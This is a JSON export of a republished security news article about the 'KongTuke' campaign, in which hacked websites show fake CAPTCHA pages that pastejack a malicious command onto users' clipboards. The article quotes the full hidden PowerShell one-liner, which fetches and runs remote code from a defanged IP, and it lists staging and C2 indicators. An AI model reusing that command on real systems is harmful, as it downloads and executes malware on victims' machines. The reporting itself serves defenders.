{"id":3096,"date":"2025-04-06T10:04:52","date_gmt":"2025-04-06T10:04:52","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/04\/06\/clipboard-hijacking-a-fake-captcha-leverage-pastejacking-script-via-hacked-sites-to-steal-clipboard-data\/"},"modified":"2025-04-06T10:04:52","modified_gmt":"2025-04-06T10:04:52","slug":"clipboard-hijacking-a-fake-captcha-leverage-pastejacking-script-via-hacked-sites-to-steal-clipboard-data","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/04\/06\/clipboard-hijacking-a-fake-captcha-leverage-pastejacking-script-via-hacked-sites-to-steal-clipboard-data\/","title":{"rendered":"\u201cClipboard Hijacking\u201d A Fake CAPTCHA Leverage Pastejacking Script Via Hacked Sites To Steal Clipboard Data"},"content":{"rendered":"<p>\u201cClipboard Hijacking\u201d A Fake CAPTCHA Leverage Pastejacking Script Via Hacked Sites To Steal Clipboard Data<\/p>\n<div>\n<p>A sophisticated new cyberattack chain dubbed \u201cKongTuke\u201d has been uncovered by cybersecurity researchers, targeting unsuspecting internet users through compromised legitimate websites. <\/p>\n<p>Detailed in a report by Bradley Duncan of Palo Alto Networks\u2019 Unit 42 team, this attack leverages malicious scripts and fake CAPTCHA pages to hijack victims\u2019 clipboards and potentially install unidentified malware. 
<\/p>\n<p>The findings were shared on April 4, 2025, with additional insights posted on X by Unit 42 Intel, highlighting the growing threat of this campaign.<\/p>\n<figure class=\"wp-block-embed is-type-rich is-provider-twitter wp-block-embed-twitter\">\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\" data-width=\"550\" data-dnt=\"true\">\n<p lang=\"en\" dir=\"ltr\">2025-04-04 (Friday): Injected <a href=\"https:\/\/twitter.com\/hashtag\/KongTuke?src=hash&amp;ref_src=twsrc%5Etfw\">#KongTuke<\/a> script in pages from legitimate but compromised websites leads to fake <a href=\"https:\/\/twitter.com\/hashtag\/CAPTCHA?src=hash&amp;ref_src=twsrc%5Etfw\">#CAPTCHA<\/a> style pages and <a href=\"https:\/\/twitter.com\/hashtag\/ClipboardHijacking?src=hash&amp;ref_src=twsrc%5Etfw\">#ClipboardHijacking<\/a> (<a href=\"https:\/\/twitter.com\/hashtag\/pastejacking?src=hash&amp;ref_src=twsrc%5Etfw\">#pastejacking<\/a>). These pages ask users to paste malicious script into a Run window. Latest info at <a href=\"https:\/\/t.co\/EFqwiGYH40\">https:\/\/t.co\/EFqwiGYH40<\/a> <a href=\"https:\/\/t.co\/gsDqluwNKF\">pic.twitter.com\/gsDqluwNKF<\/a><\/p>\n<p>\u2014 Unit 42 (@Unit42_Intel) <a href=\"https:\/\/twitter.com\/Unit42_Intel\/status\/1908253830166323637?ref_src=twsrc%5Etfw\">April 4, 2025<\/a>\n<\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script>\n<\/div>\n<\/figure>\n<h2 class=\"wp-block-heading\"><strong>The Attack Chain<\/strong><\/h2>\n<p>The KongTuke attack begins with a malicious script injected into legitimate but vulnerable websites. One such example cited in the report is hxxps:\/\/lancasternh[.]com\/6t7y.js, which redirects users to a secondary script at hxxps:\/\/lancasternh[.]com\/js.php. 
<\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgS0iQXSuhCM92yf5idXoU_6zZlC3IAv0Pk-MjSFOZGxIGAvjCh4l37nr12B5-Gsnd68r2rMUe4ThdmRuUvB4uHg81J4Dv89-nYMdIVspK7zeAn-fAk6g3L_5krcgI8Xz8T5_cBVm9A2X7z9zyzBIuG5DXf-gRx-T-lfC7dqyNbMogz02MANLboalubTxIm\/s1600\/a.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Injecting Script from compromised websites<\/figcaption><\/figure>\n<p>This script collects detailed information about the victim\u2019s device, including IP address, browser type, and referrer data, encoded in base64 format. <\/p>\n<p>From there, users are led to a deceptive \u201cverify you are human\u201d page mimicking a CAPTCHA, a common security feature meant to distinguish humans from bots.<\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgWUp88O1X1XkZzyVRyHdzr0V_KYVCG5NDq7aeyQDCmOvLG2Wg31J21Ei-n-IYvJo_1ifiWHhjsPUpQ8whr5VoLQjOaO_7gRqHQ09Z75VLP3p8-OTZgZ43-r8t-BITXs-SNimYvx0xumNlvILPK57nxmod3Qf0A0uLsEtrDXI8lATcKF2lwHP6qPiPSPpS8\/s16000\/b.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">fake CAPTCHA<\/figcaption><\/figure>\n<p>However, this CAPTCHA is a ruse. Instead of verifying identity, the page employs a technique known as \u201cclipboard hijacking\u201d or \u201cpastejacking.\u201d It covertly injects a malicious PowerShell script into the victim\u2019s clipboard, accompanied by instructions urging the user to paste and execute it via a Windows Run window. 
<\/p>\n<p>The script in question, as detailed by Duncan, is:<\/p>\n<pre class=\"wp-block-code\"><code>powershell -w h -c \"iex $(irm 138.199.156[.]22:8080\/$($z = [datetime]::UtcNow; $y = ([datetime]('01\/01\/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))\"<\/code><\/pre>\n<p>This command connects to a remote server at 138.199.156[.]22:8080, retrieving additional malicious payloads based on a timestamp calculation.<\/p>\n<h2 class=\"wp-block-heading\"><strong>Traffic and Post-Infection Activity<\/strong><\/h2>\n<p>According to the Unit 42 <a href=\"https:\/\/github.com\/PaloAltoNetworks\/Unit42-timely-threat-intel\/blob\/main\/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">report<\/a>, once executed, the script initiates a series of network requests. Initial traffic includes GET and POST requests to the same IP address, followed by connections to domains such as ecduutcykpvkbim[.]top and bfidmcjejlilflg[.]top.<\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhHUWAUCIDGGBEq4zgffUFMcBf95NkHKLvQzZq3THk1XCeymQ8xAZfQoOywjkTMC5jiVOrbjKZ8V6eDeR0IxjPyUEbMcF-UooQgJYNgcji2EEUaJQthIbIPYoW3adLXM9ItDu4pxQ1b4SXQUkTXM-RrnSLoYih2RViLauwkWkZXXszgYqfBdCgq2CnxM17E\/s16000\/C.webp?ssl=1\" alt=\"\"><\/figure>\n<p>These domains, hosted at 185.250.151[.]155:80, appear to serve as staging points for further infection. 
Post-infection, the compromised system establishes command-and-control (C2) communication with 8qvihxy8x5nyixj[.]top over TLSv1.0 HTTPS traffic via 173.232.146[.]62:25658.<\/p>\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhXQ7hyphenhyphenZSogbi21WsGDBaalhBytuRo8cwWC8PW3N274V2dtqHEsXcLbMsnGmE8TNh1uMBvU-tWpHJmZ4P5-BbGBBeimXSx3NR65d0OkMd98eMsldWODXrH0Otart7mX15a6hD7STICTn_-xH1KvcNA9Grg5VUXhrg5Cr25ICd54W7Nwh9ndJ_wTlafYYCW4\/s16000\/D.webp?ssl=1\" alt=\"\"><\/figure>\n<p>Interestingly, the infected host also performs an IP address check using services like api.ipify[.]org and ipinfo[.]io, gathering geolocation data such as city, region, and country. While this step is not inherently malicious, it suggests the attackers are profiling their victims for targeted exploitation.<\/p>\n<h2 class=\"wp-block-heading\"><strong>A Familiar Yet Elusive Threat<\/strong><\/h2>\n<p>The KongTuke campaign has been tracked by cybersecurity communities, including @monitorsg on Mastodon and ThreatFox, under the hashtag #KongTuke. <\/p>\n<p>Duncan notes that the post-infection traffic bears similarities to patterns observed with AsyncRAT, a well-known remote access trojan. <\/p>\n<p>However, the final malware payload remains unidentified, as researchers have yet to obtain a sample for analysis. 
This uncertainty underscores the evolving nature of the threat and the challenges in combating it.<\/p>\n<p>Unit 42 Intel took to X on April 4, 2025, to alert the public, stating: \u201cInjected #KongTuke script in pages from legitimate but compromised websites leads to fake #<a href=\"https:\/\/cybersecuritynews.com\/clickfix-captcha-technique-ransomware\/\" target=\"_blank\" rel=\"noreferrer noopener\">CAPTCHA<\/a> style pages and #ClipboardHijacking (#pastejacking).<\/p>\n<p>These pages ask users to paste malicious script into a Run window.\u201d The post, accessible at https:\/\/x.com\/Unit42_Intel\/status\/1908253830166323637, included a link to further details and a visual of the fake CAPTCHA page, emphasizing the urgency of awareness.<\/p>\n<p>Bradley Duncan, the author of the report, highlighted the insidious nature of this attack in his notes: \u201cThis process is sometimes called \u2018clipboard hijacking\u2019 or \u2018pastejacking,\u2019 tricking users into executing harmful code under the guise of a routine verification.\u201d <\/p>\n<p>The use of compromised legitimate websites adds a layer of trust that makes the attack particularly dangerous.<\/p>\n<p>Cybersecurity experts urge users to exercise caution when encountering CAPTCHA prompts, especially those requesting manual script execution. <\/p>\n<p>Legitimate CAPTCHAs typically involve simple tasks like image selection, not copying and pasting code. <\/p>\n<p>Users should also keep their systems updated, avoid clicking suspicious links, and employ robust antivirus software to detect and block such threats.<\/p>\n<p>As the KongTuke campaign continues to evolve, researchers at Unit 42 and beyond are working to identify the final malware and disrupt the attack infrastructure. 
For now, vigilance remains the best defense against this cunning exploitation of trust in everyday web interactions.<\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/fake-captcha\/\">\u201cClipboard Hijacking\u201d A Fake CAPTCHA Leverage Pastejacking Script Via Hacked Sites To Steal Clipboard Data<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p>Balaji N<br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/fake-captcha\/\">Go to cyber-security-news<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u201cClipboard Hijacking\u201d A Fake CAPTCHA Leverage Pastejacking Script Via Hacked Sites To Steal Clipboard Data A sophisticated new cyberattack chain dubbed \u201cKongTuke\u201d has been uncovered by cybersecurity researchers, targeting unsuspecting internet users through compromised legitimate websites. 
Detailed in a report by Bradley Duncan of Palo Alto Networks\u2019 Unit 42 team, this attack leverages malicious scripts [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63],"tags":[130],"class_list":["post-3096","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/3096"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=3096"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/3096\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=3096"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=3096"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=3096"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}